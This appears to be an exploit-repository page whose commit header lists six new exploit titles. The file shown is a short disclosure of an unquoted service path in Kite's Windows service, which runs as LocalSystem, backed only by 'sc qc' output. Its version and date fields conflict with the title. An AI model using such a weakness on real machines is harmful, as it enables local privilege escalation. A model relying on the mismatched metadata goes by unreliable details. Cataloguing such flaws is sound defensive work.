46346f8944
6 changes to exploits/shellcodes Kite 1.2021.610.0 - Unquoted Service Path Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path IOTransfer 4.0 - Remote Code Execution (RCE) Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS) CodoForum v5.1 - Remote Code Execution (RCE) OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
22 lines
No EOL
755 B
Text
22 lines
No EOL
755 B
Text
# Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path
|
|
# Date: 2020-11-6
|
|
# Exploit Author: Ghaleb Al-otaibi
|
|
# Vendor Homepage: https://www.kite.com/
|
|
# Version: Version 4.2.0.1 U1
|
|
# Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044
|
|
# CVE : NA
|
|
|
|
# Service info:
|
|
C:\Windows\system32\cmd.exe>sc qc KiteService
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: KiteService
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 0 IGNORE
|
|
BINARY_PATH_NAME : C:\Program Files\Kite\KiteService.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : KiteService
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem |